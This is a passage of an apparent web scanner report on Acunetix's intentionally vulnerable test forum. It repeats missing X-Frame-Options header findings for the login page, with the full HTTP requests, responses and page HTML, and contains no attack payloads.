<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 